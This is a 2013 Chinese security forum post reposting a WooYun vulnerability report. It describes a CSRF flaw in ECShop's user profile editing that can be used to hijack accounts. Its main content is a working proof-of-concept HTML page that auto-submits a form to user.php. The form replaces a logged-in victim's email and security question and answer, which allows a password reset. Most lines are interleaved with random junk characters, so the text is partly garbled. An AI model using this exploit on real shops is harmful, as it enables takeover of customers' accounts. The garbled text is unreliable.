找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2325|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:0 n1 c) R3 Z1 J* K, G* H+ O' |: j. q
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
1 s& F  w; D3 V# i# c% }2 ]* H; ~4 d& k# b, W* C
Demo For:http://www.wooyun.org/bug.php?action=view&id=3955 z# W$ X9 q5 `" {) `# \! n( x: S5 G

4 H0 p0 [3 l- p详细说明:
* g8 S4 }7 e7 D  ]+ s$ h4 O+ l% u利用csrf和xss可以突破官方所说的“障碍”
4 t- ^5 ?9 p, B5 I+ e8 A4 rxss版本已经有人说明3 b$ s: o8 [$ }2 ]* e+ Z) u
这里给出csrf版本
! T7 i0 a2 T# C% Z% v5 ~9 {% d- V5 v6 m! H; H) t
漏洞证明:
1 K  V% }0 f- B/ p<html>7 R0 H  ~; {% l! Q
<body>
& D! r, G/ V$ ]4 G. ]<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
* ~  h- T0 _7 z! j" w<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">) e% K4 S. U5 q: c
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
6 k8 Y' M+ w% r4 Y  s  M<INPUT TYPE="text" NAME="sel_question" value="ecshop">& ~( K! ~$ `% B2 e4 A2 i8 z  ~
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">( `6 ^2 {8 e0 T
</body>3 l# f5 b" ~$ o
<script>7 A0 v9 d+ B& w) h
document.forms[0].submit();
4 a$ w  O% b- {</script>
& i5 r/ p8 W- H) S) X</html>
* g8 g/ X2 i1 h! z; O构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失- L# B1 |9 @. ^/ u. U
/ J) K8 i1 @) l' {7 p9 w4 Q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表